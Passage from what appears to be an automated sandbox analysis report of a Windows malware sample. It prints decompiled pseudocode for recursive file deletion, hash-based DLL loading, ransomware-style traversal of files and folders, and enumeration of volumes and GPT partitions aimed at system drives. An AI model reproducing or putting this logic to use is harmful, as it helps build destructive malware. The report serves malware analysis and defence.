                				_t45 =  *0x11012d4(_a4);
                				_t73 = _t72 + 4;
                				if(_t45 != 0) {
                					_t45 = E010F5F98(6 + _t45 * 2);
                					_v16 = _t45;
                					if(_v16 != 0) {
                						 *0x11012dc(_v16, _a4);
                						E010F16B4(_v16);
                						_v12 = 0x2a;
                						 *0x11012d8(_v16,  &_v12);
                						_t75 = _t73 + 0x10;
                						_t45 = FindFirstFileExW(_v16, 0,  &_v612, 0, 0, 0); // executed
                						_v8 = _t45;
                						if(_v8 != 0xffffffff) {
                							do {
                								_t68 =  &(_v612.cFileName);
                								if( *_t68 != 0x2e &&  *_t68 != 0x2e002e) {
                									_t55 =  *0x11012d4(_t68);
                									_t56 =  *0x11012d4(_v16);
                									_t75 = _t75 + 8;
                									_v20 = E010F5F98(2 + (_t55 + _t56) * 2);
                									if(_v20 != 0) {
                										 *0x11012dc(_v20, _v16);
                										_t60 =  *0x11012e8(_v20, 0x2a);
                										 *0x11012dc(_t60,  &(_v612.cFileName));
                										_t75 = _t75 + 0x18;
                										_t62 = GetFileAttributesW(_v20); // executed
                										if((_t62 & 0x00000010) == 0) {
                											DeleteFileW(_v20); // executed
                											E010F5FB3(_v20);
                											_v20 = 0;
                										} else {
                											while(1) {
                												_push(_v20);
                												if( *0x11013d8() != 0) {
                													break;
                												}
                												if( *[fs:0x34] == 0x91) {
                													E010F6BBF(_v20);
                													continue;
                												}
                												L13:
                												E010F5FB3(_v20);
                												_v20 = 0;
                												goto L15;
                											}
                											goto L13;
                										}
                									}
                								}
                								L15:
                								_t54 = FindNextFileW(_v8,  &_v612); // executed
                							} while (_t54 != 0);
                							_t45 = FindClose(_v8); // executed
                						}
                					}
                					if(_v16 != 0) {
                						_t45 = E010F5FB3(_v16);
                					}
                					if(_v20 != 0) {
                						return E010F5FB3(_v20);
                					}
                				}
                				return _t45;
                			}


















                0x010f6bca
                0x010f6bd1
                0x010f6bdb
                0x010f6be1
                0x010f6be6
                0x010f6bf4
                0x010f6bf9
                0x010f6c00
                0x010f6c0c
                0x010f6c18
                0x010f6c1d
                0x010f6c2b
                0x010f6c31
                0x010f6c46
                0x010f6c4c
                0x010f6c53
                0x010f6c59
                0x010f6c59
                0x010f6c62
                0x010f6c75
                0x010f6c83
                0x010f6c89
                0x010f6c9b
                0x010f6ca2
                0x010f6cae
                0x010f6cbc
                0x010f6ccd
                0x010f6cd3
                0x010f6cd9
                0x010f6ce4
                0x010f6d24
                0x010f6d2d
                0x010f6d32
                0x010f6ce6
                0x010f6ce6
                0x010f6ce6
                0x010f6cf1
                0x00000000
                0x00000000
                0x010f6d00
                0x010f6d05
                0x00000000
                0x010f6d0e
                0x010f6d10
                0x010f6d13
                0x010f6d18
                0x00000000
                0x010f6d18
                0x00000000
                0x010f6cf3
                0x010f6ce4
                0x010f6ca2
                0x010f6d39
                0x010f6d43
                0x010f6d49
                0x010f6d54
                0x010f6d54
                0x010f6c53
                0x010f6d5e
                0x010f6d63
                0x010f6d63
                0x010f6d6c
                0x00000000
                0x010f6d71
                0x010f6d6c
                0x010f6d7b

                APIs
                  • Part of subcall function 010F5F98: RtlAllocateHeap.NTDLL(?,00000008,?,?,010F6457,00000014,?), ref: 010F5FA9
                • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 010F6C46
                • GetFileAttributesW.KERNEL32(00000000), ref: 010F6CD9
                • DeleteFileW.KERNEL32(00000000), ref: 010F6D24
                • FindNextFileW.KERNELBASE(000000FF,?), ref: 010F6D43
                • FindClose.KERNELBASE(000000FF), ref: 010F6D54
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: File$Find$AllocateAttributesCloseDeleteFirstHeapNext
                • String ID: *
                • API String ID: 333766196-163128923
                • Opcode ID: 0b5722e496ad302a7a9a6fd636b285943f9665ac95ea2fe768f46e9d25f0f1a2
                • Instruction ID: dd4da41ad0523997ae87e7c806dd445801a1b4c53f853998240cc045df8032b6
                • Opcode Fuzzy Hash: 0b5722e496ad302a7a9a6fd636b285943f9665ac95ea2fe768f46e9d25f0f1a2
                • Instruction Fuzzy Hash: 86416D70C00119FBEF266FA4DC0ABEDBB74FF00305F1445B8E661A55A0D7B646A4DB81
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 176 10f5928-10f5940 177 10f5942-10f595c call 10f581d 176->177 178 10f5961-10f5968 176->178 177->178 180 10f596a-10f5984 call 10f581d 178->180 181 10f5989-10f5990 178->181 180->181 184 10f5992-10f59ac call 10f581d 181->184 185 10f59b1-10f59b8 181->185 184->185 186 10f59ba-10f59d4 call 10f581d 185->186 187 10f59d9-10f59e2 185->187 186->187 192 10f5a1f-10f5a38 FindFirstFileW 187->192 193 10f59e4-10f59e5 call 10f1654 187->193 196 10f5a7c-10f5a83 192->196 197 10f5a3a-10f5a4b call 10f10bb 192->197 198 10f59ea-10f59ee 193->198 203 10f5a5f-10f5a71 FindNextFileW 197->203 204 10f5a4d-10f5a5d LoadLibraryW 197->204 200 10f5a1a-10f5a1d 198->200 201 10f59f0-10f5a18 198->201 200->198 201->192 203->197 205 10f5a73-10f5a76 FindClose 203->205 204->205 205->196
                C-Code - Quality: 100%
                			E010F5928(intOrPtr _a4) {
                				struct HINSTANCE__* _v8;
                				void* _v12;
                				struct _WIN32_FIND_DATAW _v604;
                				void* _t21;
                				int _t26;
                				struct HINSTANCE__* _t29;
                				signed int* _t39;
                
                				_v8 = 0;
                				if( *0x110121c == 0) {
                					 *0x110121c = 0xffffffffda1aaea2;
                					 *0x110121c = E010F581D( *0x110121c);
                				}
                				if( *0x1101220 == 0) {
                					 *0x1101220 = 0x576ac9d5;
                					 *0x1101220 = E010F581D( *0x1101220);
                				}
                				if( *0x1101224 == 0) {
                					 *0x1101224 = 0x78403a7c;
                					 *0x1101224 = E010F581D( *0x1101224);
                				}
                				if( *0x1101228 == 0) {
                					 *0x1101228 = 0x28805eb2;
                					 *0x1101228 = E010F581D( *0x1101228);
                				}
                				_t39 = 0x110122c;
                				if( *0x110122c == 0) {
                					E010F1654(_t19, 0x110122c);
                					while( *_t39 != 0) {
                						_t39 =  &(_t39[0]);
                					}
                					 *_t39 = 0x222c5fb1;
                					_t39[1] = 0x22625fc3;
                					_t39[2] = 0x226a5f81;
                					 *_t39 =  *_t39 ^ 0x22065fed;
                					_t39[1] = _t39[1] ^ 0x22065fed;
                					_t39[2] = _t39[2] ^ 0x22065fed;
                				}
                				_t21 = FindFirstFileW("C:\Windows\System32\*.dll",  &_v604); // executed
                				_v12 = _t21;
                				if(_v12 != 0xffffffff) {
                					while(E010F10BB( &(_v604.cFileName), 0) != _a4) {
                						_t26 = FindNextFileW(_v12,  &_v604); // executed
                						if(_t26 != 0) {
                							continue;
                						}
                						L17:
                						FindClose(_v12); // executed
                						goto L18;
                					}
                					_t29 = LoadLibraryW( &(_v604.cFileName)); // executed
                					_v8 = _t29;
                					goto L17;
                				}
                				L18:
                				return _v8;
                			}










                0x010f5932
                0x010f5940
                0x010f594c
                0x010f595c
                0x010f595c
                0x010f5968
                0x010f5974
                0x010f5984
                0x010f5984
                0x010f5990
                0x010f599c
                0x010f59ac
                0x010f59ac
                0x010f59b8
                0x010f59c4
                0x010f59d4
                0x010f59d4
                0x010f59d9
                0x010f59e2
                0x010f59e5
                0x010f59ea
                0x010f5a1a
                0x010f5a1a
                0x010f59f0
                0x010f59f6
                0x010f59fd
                0x010f5a04
                0x010f5a0a
                0x010f5a11
                0x010f5a11
                0x010f5a2b
                0x010f5a31
                0x010f5a38
                0x010f5a3a
                0x010f5a69
                0x010f5a71
                0x00000000
                0x00000000
                0x010f5a73
                0x010f5a76
                0x00000000
                0x010f5a76
                0x010f5a54
                0x010f5a5a
                0x00000000
                0x010f5a5a
                0x010f5a7c
                0x010f5a83

                APIs
                • FindFirstFileW.KERNEL32(C:\Windows\System32\*.dll,?), ref: 010F5A2B
                • LoadLibraryW.KERNEL32(?,?,00000000), ref: 010F5A54
                • FindNextFileW.KERNEL32(000000FF,?,?,00000000), ref: 010F5A69
                • FindClose.KERNEL32(000000FF), ref: 010F5A76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Find$File$CloseFirstLibraryLoadNext
                • String ID: C:\Windows\System32\*.dll
                • API String ID: 392244664-1305136377
                • Opcode ID: 267c563f69bcaeafd2c574ca7e0ef47be166e7bbd40428c8970029a94798f247
                • Instruction ID: 9e04b19b2e861797006eea4691e3f490968d18f41b0ea987bc2031ecf4e6951d
                • Opcode Fuzzy Hash: 267c563f69bcaeafd2c574ca7e0ef47be166e7bbd40428c8970029a94798f247
                • Instruction Fuzzy Hash: 4B318DB0C01304FFCB2ADF60E886AAD7BB4E718310F2081A9E661DA558E3B8C595CF54
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 331 10fbf33-10fbf4a GetFileAttributesW 332 10fbf4c-10fbf62 call 10f67f0 call 10f87e7 331->332 333 10fbf96-10fbfad SetThreadPriority call 10f155e 331->333 343 10fbf88-10fbf93 call 10f5fb3 332->343 344 10fbf64-10fbf68 332->344 341 10fbfaf-10fbfb6 333->341 342 10fbfb8 333->342 346 10fbfbf-10fbfd2 call 10f5f98 341->346 342->346 347 10fbf6a-10fbf6e 344->347 348 10fbf70-10fbf83 call 10f9a57 call 10fbc06 344->348 355 10fbfd9-10fc019 call 10f9a57 call 10fbd96 call 10f5fb3 FindFirstFileExW 346->355 347->343 347->348 348->343 362 10fc01f-10fc02d 355->362 363 10fc150-10fc165 call 10f5fb3 355->363 367 10fc032-10fc03b 362->367 368 10fc169-10fc17d 363->368 369 10fc167-10fc185 call 10f5fb3 363->369 371 10fc12f-10fc141 FindNextFileW 367->371 372 10fc041-10fc047 367->372 368->355 376 10fc18a-10fc18d 369->376 371->367 375 10fc147-10fc14a FindClose 371->375 372->371 374 10fc04d-10fc057 372->374 374->371 377 10fc05d-10fc061 374->377 375->363 377->371 378 10fc067-10fc06b 377->378 379 10fc06d-10fc075 call 10fbee0 378->379 380 10fc095-10fc09d call 10fbe4a 378->380 385 10fc077-10fc08e call 10fbdf8 379->385 386 10fc090 379->386 380->371 387 10fc0a3-10fc0aa 380->387 385->386 386->371 389 10fc0ac-10fc0b3 387->389 390 10fc0b5-10fc0c9 call 10f9a17 387->390 389->371 389->390 394 10fc0cd-10fc0eb call 10fbdf8 call 10f67f0 call 10fbc06 390->394 395 10fc0cb 390->395 401 10fc0f0-10fc0f7 394->401 395->371 401->371 402 10fc0f9-10fc0fb 401->402 403 10fc0fd-10fc122 402->403 404 10fc124 402->404 403->371 404->371
                C-Code - Quality: 78%
                			E010FBF33(WCHAR* _a4) {
                				void* _v8;
                				long _v12;
                				signed int _v16;
                				WCHAR* _v20;
                				WCHAR* _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				char _v36;
                				struct _WIN32_FIND_DATAW _v628;
                				signed int _t67;
                				intOrPtr _t71;
                				void* _t77;
                				signed int _t79;
                				void* _t80;
                				short* _t81;
                				int _t83;
                				signed short _t84;
                				void* _t89;
                				intOrPtr _t94;
                				intOrPtr* _t104;
                				void* _t111;
                
                				_t67 = GetFileAttributesW(_a4); // executed
                				if((_t67 & 0x00000010) != 0) {
                					SetThreadPriority( *0x11013fc(), 2); // executed
                					if(E010F155E() <= 0x3c) {
                						_v12 = 0;
                					} else {
                						_v12 = 2;
                					}
                					_t71 = E010F5F98(0x3d0900); // executed
                					_v28 = _t71;
                					_t72 = _a4;
                					_v24 = _a4;
                					_v16 = 0xffffffff;
                					while(1) {
                						E010F9A57(_t72, _v24, 0x1100ffc); // executed
                						_v20 = E010FBD96(_v24);
                						E010F5FB3(_v24);
                						_t77 = FindFirstFileExW(_v20, 0,  &_v628, 0, 0, _v12); // executed
                						_v8 = _t77;
                						if(_v8 == 0xffffffff) {
                							goto L31;
                						} else {
                							_t81 =  *0x11012e8(_v20, 0x2a);
                							_t111 = _t111 + 8;
                							 *_t81 = 0;
                							goto L12;
                						}
                						do {
                							L12:
                							_t104 =  &(_v628.cFileName);
                							if( *_t104 != 0x2e &&  *_t104 != 0x2e002e) {
                								_t84 = _v628.dwFileAttributes;
                								if((_t84 & 0x00000400) == 0 && (_t84 & 0x00000004) == 0) {
                									if((_t84 & 0x00000010) == 0) {
                										if(E010FBE4A(_t104) == 0 && (_v628.nFileSizeHigh != 0 || _v628.nFileSizeLow != 0)) {
                											if(E010F9A17(_v628.nFileSizeLow, _v628.nFileSizeHigh, _t104) == 0) {
                												E010F67F0(E010FBDF8(_v20, _t104)); // executed
                												_t89 = E010FBC06(_t87, _v628.nFileSizeLow, _v628.nFileSizeHigh); // executed
                												if( *0x1100fb7 != 0) {
                													if(_t89 == 0) {
                														 *0x11013c0(0x110100c);
                													} else {
                														 *0x11013c0(0x1101000);
                														asm("lock add [0x1101004], eax");
                														asm("lock adc [0x1101008], edx");
                													}
                												}
                											}
                										}
                									} else {
                										if(E010FBEE0(_t104) == 0) {
                											_t94 = E010FBDF8(_v20, _t104);
                											_v16 = _v16 + 1;
                											 *((intOrPtr*)(_v28 + _v16 * 4)) = _t94;
                										}
                									}
                								}
                							}
                							_t83 = FindNextFileW(_v8,  &_v628); // executed
                						} while (_t83 != 0);
                						FindClose(_v8); // executed
                						L31:
                						E010F5FB3(_v20);
                						_v20 = 0;
                						_t79 = _v16;
                						if(_t79 != 0xffffffff) {
                							_t72 = _v28 + _t79 * 4;
                							 *_t72 = 0;
                							_v24 =  *_t72;
                							_v16 = _v16 - 1;
                							continue;
                						}
                						_t80 = E010F5FB3(_v28); // executed
                						return _t80;
                						goto L35;
                					}
                				} else {
                					E010F67F0(_a4);
                					if(E010F87E7(_a4,  &_v36) != 0 && (_v32 != 0 || _v36 != 0)) {
                						E010F9A57(_t100, _a4, 0);
                						E010FBC06(_a4, _v36, _v32);
                					}
                					return E010F5FB3(_a4);
                				}
                				L35:
                			}
























                0x010fbf3f
                0x010fbf4a
                0x010fbf9f
                0x010fbfad
                0x010fbfb8
                0x010fbfaf
                0x010fbfaf
                0x010fbfaf
                0x010fbfc4
                0x010fbfc9
                0x010fbfcc
                0x010fbfcf
                0x010fbfd2
                0x010fbfd9
                0x010fbfe1
                0x010fbfee
                0x010fbff4
                0x010fc00c
                0x010fc012
                0x010fc019
                0x00000000
                0x010fc01f
                0x010fc024
                0x010fc02a
                0x010fc02d
                0x010fc02d
                0x010fc02d
                0x010fc032
                0x010fc032
                0x010fc032
                0x010fc03b
                0x010fc04d
                0x010fc057
                0x010fc06b
                0x010fc09d
                0x010fc0c9
                0x010fc0d9
                0x010fc0eb
                0x010fc0f7
                0x010fc0fb
                0x010fc129
                0x010fc0fd
                0x010fc102
                0x010fc114
                0x010fc11b
                0x010fc11b
                0x010fc0fb
                0x010fc0f7
                0x010fc0c9
                0x010fc06d
                0x010fc075
                0x010fc07b
                0x010fc082
                0x010fc08e
                0x010fc08e
                0x010fc090
                0x010fc06b
                0x010fc057
                0x010fc139
                0x010fc13f
                0x010fc14a
                0x010fc150
                0x010fc153
                0x010fc158
                0x010fc15f
                0x010fc165
                0x010fc16c
                0x010fc171
                0x010fc177
                0x010fc17a
                0x00000000
                0x010fc17a
                0x010fc185
                0x010fc18d
                0x00000000
                0x010fc18d
                0x010fbf4c
                0x010fbf4f
                0x010fbf62
                0x010fbf75
                0x010fbf83
                0x010fbf83
                0x010fbf93
                0x010fbf93
                0x00000000

                APIs
                • GetFileAttributesW.KERNEL32(?), ref: 010FBF3F
                • SetThreadPriority.KERNEL32(00000000,00000002), ref: 010FBF9F
                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,01100FFC,003D0900), ref: 010FC00C
                • FindNextFileW.KERNEL32(000000FF,?), ref: 010FC139
                • FindClose.KERNELBASE(000000FF), ref: 010FC14A
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: FileFind$AttributesCloseFirstNextPriorityThread
                • String ID:
                • API String ID: 325206038-0
                • Opcode ID: ad08ed4d95a45b95465c8160987dbfec008d2889baea86c4c061eaf1898baa30
                • Instruction ID: eecd2270c3bdff102f6c328e573227a518b2353583d6576ef0ac42dad0636031
                • Opcode Fuzzy Hash: ad08ed4d95a45b95465c8160987dbfec008d2889baea86c4c061eaf1898baa30
                • Instruction Fuzzy Hash: 57515C30D0021EEBEF22AF64CD46BEDBBB5FF05341F0001A8E694A59A0D7758A95DF41
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 406 10f8dc6-10f8e01 FindFirstVolumeW 408 10f8e07-10f8e0d 406->408 409 10f9013-10f9018 406->409 410 10f8e13-10f8e1a 408->410 411 10f8fe2-10f9004 408->411 410->411 412 10f8e20-10f8e37 GetVolumePathNamesForVolumeNameW 410->412 411->408 420 10f900a 411->420 412->411 413 10f8e3d-10f8e41 412->413 413->411 415 10f8e47-10f8e4b 413->415 415->411 416 10f8e51-10f8e5b GetDriveTypeW 415->416 418 10f8e5d-10f8e60 416->418 419 10f8e66-10f8e6e call 10f155e 416->419 418->411 418->419 423 10f8e74-10f8ebc 419->423 424 10f8ef0-10f8f16 call 10f16e3 CreateFileW 419->424 420->409 434 10f8ebe-10f8ed7 call 10f8d3a 423->434 435 10f8edc-10f8ee0 423->435 428 10f8f1c-10f8f42 DeviceIoControl 424->428 429 10f8fd9 424->429 428->429 430 10f8f48-10f8f4f 428->430 429->411 432 10f8fb5-10f8fbc 430->432 433 10f8f51-10f8f5d 430->433 432->429 436 10f8fbe-10f8fc5 432->436 437 10f8f5f-10f8f66 433->437 438 10f8f7c-10f8f82 433->438 434->435 439 10f8eeb 435->439 440 10f8ee2 435->440 436->429 441 10f8fc7-10f8fd4 call 10f16b4 call 10f8d3a 436->441 437->438 442 10f8f68-10f8f6f 437->442 444 10f8f84-10f8f8b 438->444 445 10f8fa1-10f8fae call 10f16b4 call 10f8d3a 438->445 439->411 440->439 441->429 442->438 447 10f8f71-10f8f78 442->447 444->445 449 10f8f8d-10f8f94 444->449 457 10f8fb3 445->457 447->438 452 10f8f7a 447->452 449->445 453 10f8f96-10f8f9d 449->453 452->457 453->445 458 10f8f9f 453->458 457->429 458->457
                C-Code - Quality: 27%
                			E010F8DC6() {
                				intOrPtr _v8;
                				void* _v12;
                				long _v16;
                				char _v144;
                				char _v664;
                				char _v775;
                				char _v776;
                				void _v808;
                				intOrPtr _t38;
                				void* _t42;
                				int _t43;
                				void* _t46;
                				int _t50;
                				intOrPtr* _t53;
                				signed int _t56;
                				WCHAR* _t57;
                				void* _t60;
                				short* _t63;
                				WCHAR* _t64;
                				void* _t65;
                				void* _t66;
                
                				_t64 =  &_v664;
                				_t63 =  &_v144;
                				 *0x11012c0(_t64, 0, 0x208);
                				_t66 = _t65 + 0xc;
                				_t38 =  *0x1101408(_t64, 0x104); // executed
                				_v8 = _t38;
                				if(_v8 == 0) {
                					return _t38;
                				} else {
                					goto L1;
                				}
                				do {
                					L1:
                					if( *_t64 == 0x5c005c && _t64[2] == 0x5c003f) {
                						_v16 = 0;
                						_t42 =  *0x1101418(_t64, _t63, 0x40,  &_v16); // executed
                						if(_t42 != 0 &&  *_t63 == 0 && _v16 == 1) {
                							_t43 = GetDriveTypeW(_t64); // executed
                							if(_t43 == 3 || _t43 == 2) {
                								if(E010F155E() >= 0x3d) {
                									E010F16E3(_t64);
                									_t46 = CreateFileW(_t64, 0x80000000, 3, 0, 3, 0x80, 0); // executed
                									_v12 = _t46;
                									if(_v12 != 0xffffffff) {
                										_t50 = DeviceIoControl(_v12, 0x70048, 0, 0,  &_v808, 0x90,  &_v16, 0); // executed
                										if(_t50 != 0) {
                											if(_v808 != 1) {
                												if(_v808 == 0 && _v775 == 0) {
                													E010F16B4(_t64);
                													E010F8D3A( *0x1100fe8, _t64);
                												}
                											} else {
                												_t53 =  &_v776;
                												if( *_t53 != 0xc12a7328 ||  *((intOrPtr*)(_t53 + 4)) != 0x11d2f81f ||  *((intOrPtr*)(_t53 + 8)) != 0xa0004bba ||  *((intOrPtr*)(_t53 + 0xc)) != 0x3bc93ec9) {
                													if( *_t53 != 0xde94bba4 ||  *((intOrPtr*)(_t53 + 4)) != 0x4d4006d1 ||  *((intOrPtr*)(_t53 + 8)) != 0xd5bf6aa1 ||  *((intOrPtr*)(_t53 + 0xc)) != 0xacd67901) {
                														E010F16B4(_t64);
                														E010F8D3A( *0x1100fe8, _t64);
                													}
                												}
                											}
                										}
                									}
                									 *0x1101354(_v12);
                								} else {
                									_t56 =  *0x11012d4(_t64);
                									_t66 = _t66 + 4;
                									_t57 =  &(_t64[_t56]);
                									 *_t57 = 0x6f0062;
                									_t57[2] = 0x74006f;
                									_t57[4] = 0x67006d;
                									_t57[6] = 0x72;
                									_v12 =  *0x1101394(_t64, 0x80000000, 3, 0, 3, 0x80, 0);
                									if(_v12 == 0xffffffff) {
                										_t60 =  *0x11012e8(_t64, 0x5c);
                										_t66 = _t66 + 8;
                										 *((short*)(_t60 + 2)) = 0;
                										E010F8D3A( *0x1100fe8, _t64);
                									}
                									if(_v12 != 0xffffffff) {
                										 *0x1101354(_v12);
                									}
                								}
                							}
                						}
                					}
                					 *0x11012c0(_t64, 0, 0x208);
                					_t66 = _t66 + 0xc;
                					_push(0x104);
                					_push(_t64);
                					_push(_v8);
                				} while ( *0x110140c() != 0);
                				return  *0x1101410(_v8);
                			}
























                0x010f8dd1
                0x010f8dd7
                0x010f8de5
                0x010f8deb
                0x010f8df4
                0x010f8dfa
                0x010f8e01
                0x010f9018
                0x00000000
                0x00000000
                0x00000000
                0x010f8e07
                0x010f8e07
                0x010f8e0d
                0x010f8e20
                0x010f8e2f
                0x010f8e37
                0x010f8e52
                0x010f8e5b
                0x010f8e6e
                0x010f8ef1
                0x010f8f09
                0x010f8f0f
                0x010f8f16
                0x010f8f3a
                0x010f8f42
                0x010f8f4f
                0x010f8fbc
                0x010f8fc8
                0x010f8fd4
                0x010f8fd4
                0x010f8f51
                0x010f8f51
                0x010f8f5d
                0x010f8f82
                0x010f8fa2
                0x010f8fae
                0x010f8fae
                0x010f8f82
                0x010f8fb3
                0x010f8f4f
                0x010f8f42
                0x010f8fdc
                0x010f8e74
                0x010f8e75
                0x010f8e7b
                0x010f8e7e
                0x010f8e81
                0x010f8e87
                0x010f8e8e
                0x010f8e95
                0x010f8eb5
                0x010f8ebc
                0x010f8ec1
                0x010f8ec7
                0x010f8eca
                0x010f8ed7
                0x010f8ed7
                0x010f8ee0
                0x010f8ee5
                0x010f8ee5
                0x010f8eeb
                0x010f8e6e
                0x010f8e5b
                0x010f8e37
                0x010f8fea
                0x010f8ff0
                0x010f8ff3
                0x010f8ff8
                0x010f8ff9
                0x010f9002
                0x00000000

                APIs
                • FindFirstVolumeW.KERNEL32(?,00000104), ref: 010F8DF4
                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000040,00000000), ref: 010F8E2F
                • GetDriveTypeW.KERNEL32(?), ref: 010F8E52
                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?), ref: 010F8F09
                • DeviceIoControl.KERNEL32(000000FF,00070048,00000000,00000000,?,00000090,00000001,00000000), ref: 010F8F3A
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Volume$ControlCreateDeviceDriveFileFindFirstNameNamesPathType
                • String ID:
                • API String ID: 665866475-0
                • Opcode ID: 0ae612ac1ebd8a9443d9aa224b4dd74b668273ffd8c962c2b62b7d7665cce508
                • Instruction ID: e4d0dbc1beb50084478396600113b71f1c4f3eaa01813b644027c958879529a1
                • Opcode Fuzzy Hash: 0ae612ac1ebd8a9443d9aa224b4dd74b668273ffd8c962c2b62b7d7665cce508
                • Instruction Fuzzy Hash: AD519E30900214FFEB329B54DC0AFDE7BA9AF01725F10C1AEF395A54A1D7B48689CB56
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 573 10f890b-10f893c CreateThread 574 10f893e-10f8942 573->574 575 10f899a-10f89a0 573->575 576 10f8944-10f894a call 10f8766 574->576 577 10f8970-10f8994 ResumeThread GetExitCodeThread NtClose 574->577 580 10f894f-10f8951 576->580 577->575 580->577 581 10f8953-10f896d 580->581
                C-Code - Quality: 53%
                			E010F890B(intOrPtr _a4, void* _a8) {
                				void* _v8;
                				long _v12;
                				void* _t18;
                				void* _t25;
                
                				_v12 = 0;
                				_v8 = 0;
                				_t18 = CreateThread(0, 0, E010F88FB, _a8, 4, 0); // executed
                				_v8 = _t18;
                				if(_v8 == 0) {
                					L5:
                					return _v12;
                				} else {
                					if(_a4 == 0) {
                						L4:
                						ResumeThread(_v8); // executed
                						 *0x11013ac(_v8, 0xffffffff);
                						GetExitCodeThread(_v8,  &_v12); // executed
                						NtClose(_v8); // executed
                						goto L5;
                					} else {
                						_t25 = E010F8766(_a4, _v8); // executed
                						if(_t25 != 0) {
                							goto L4;
                						} else {
                							 *0x1101350(_v8, 0);
                							 *0x1101354(_v8);
                							return _v12;
                						}
                					}
                				}
                			}







                0x010f8911
                0x010f8918
                0x010f892f
                0x010f8935
                0x010f893c
                0x010f899a
                0x010f89a0
                0x010f893e
                0x010f8942
                0x010f8970
                0x010f8973
                0x010f897e
                0x010f898b
                0x010f8994
                0x00000000
                0x010f8944
                0x010f894a
                0x010f8951
                0x00000000
                0x010f8953
                0x010f8958
                0x010f8961
                0x010f896d
                0x010f896d
                0x010f8951
                0x010f8942

                APIs
                • CreateThread.KERNEL32(00000000,00000000,010F88FB,?,00000004,00000000), ref: 010F892F
                • ResumeThread.KERNEL32(00000000), ref: 010F8973
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 010F898B
                • NtClose.NTDLL(00000000), ref: 010F8994
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Thread$CloseCodeCreateExitResume
                • String ID:
                • API String ID: 2777208839-0
                • Opcode ID: b03d0407033e03ce7c9a98a120339c02ec0a30e0270dd271308ad7ddfd759119
                • Instruction ID: 3100906f6b8b644acfcf295c499d35a875ccb2c44b5a0f9859390d46b525a362
                • Opcode Fuzzy Hash: b03d0407033e03ce7c9a98a120339c02ec0a30e0270dd271308ad7ddfd759119
                • Instruction Fuzzy Hash: 09118E30804208FFDF269F90DD0ABDCBBB1FB04321F2041A9FA10695A0D7B55BA4EB00
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
